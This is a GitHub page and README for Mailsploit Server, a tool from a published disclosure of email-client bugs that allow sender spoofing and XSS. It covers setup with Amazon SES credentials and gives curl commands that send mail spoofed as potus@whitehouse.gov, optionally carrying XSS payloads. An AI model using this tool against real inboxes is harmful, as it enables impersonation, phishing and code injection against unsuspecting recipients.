(Released in December 2017) Mailsploit is a collection of bugs in email clients that allow effective sender spoofing and code injection attacks. The spoofing is not detected by Mail Transfer Agents (MTA) aka email servers, therefore circumventing spoofing protection mechanisms such as DMARC (DKIM/SPF) or spam filters.
Switch branches/tags
Nothing to show
Clone or download
Latest commit 30d0b70 Jun 17, 2018
Failed to load latest commit information.
resources Logo (again) Jun 16, 2018
src/main v1.0.4 Jun 16, 2018
.editorconfig Codebase Nov 17, 2017
.gitignore v1.0.4 Jun 16, 2018
.npmignore Codebase Nov 17, 2017
README.md Small but important detail Jun 17, 2018
package.json v1.0.4 Jun 16, 2018
tsconfig.json Codebase Nov 17, 2017
yarn.lock v1.0.4 Jun 16, 2018


Mailsploit logo

Mailsploit Server

Note: You will need an Amazon SES account with a verified domain in order to use the tool. Also, the web server can only run at 88 miles per hour.

How to install

  1. Clone the repository
  2. Edit originalFrom in src/main/Config.ts with your verified SES email address.
  3. Run the following commands in the terminal:
yarn install && yarn dist # Require yarn

How to launch the web server

  1. Run the following command in the terminal:
SES_USERNAME=[Amazon SES Username] SES_PASSWORD=[Amazon SES Password] node dist/commonjs/index.js
  1. That's it. The server will run on localhost:8081

How to use it

You can do a POST request containing sender, receiver and options (from 0 to 13) parameters to the /process endpoint.

Example using cURL (payload 3 without XSS):

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&options=2"

or, all the payloads with XSS:

curl --url http://localhost:8081/process --data "sender=potus@whitehouse.gov&receiver=sabri@riseup.net&xss=true&options=-1"

All the payloads are available here.